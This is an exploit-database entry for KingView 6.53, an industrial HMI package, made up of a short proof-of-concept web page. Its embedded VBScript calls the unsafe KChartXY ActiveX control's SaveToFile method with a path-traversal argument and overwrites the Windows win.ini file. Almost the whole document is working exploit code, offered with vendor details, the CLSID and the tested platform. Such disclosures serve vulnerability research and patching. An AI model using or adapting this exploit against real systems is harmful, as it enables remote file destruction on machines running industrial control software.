KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)
Ruben Garrote Garca | 04.09.2013 | Verified | Vulnerable-App |
Local Exploits | Windows |
Exploit Code
<!-- KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite Vendor: http://www.wellintech.com Version: KingView 6.53 Tested on: Windows XP SP3 / IE Download: http://www.wellintech.com/documents/KingView6.53_EN.zip Author: Blake CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC ProgId: KCHARTXYLib.KChartXY Path: C:\Program Files\KingView\KChartXY.ocx MemberName: SaveToFile Safe for scripting: False Safe for init: False Kill Bit: False IObject safety not implemented Description: Proof of concept overwrites the win.ini file --> <html> <object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' ></object> <script language='vbscript'> arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini" target.SaveToFile arg1 </script>